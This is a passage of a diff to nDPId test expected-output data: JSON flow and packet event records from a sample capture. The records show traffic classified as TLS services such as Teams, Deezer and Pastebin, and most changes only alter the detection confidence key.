-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} 
01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 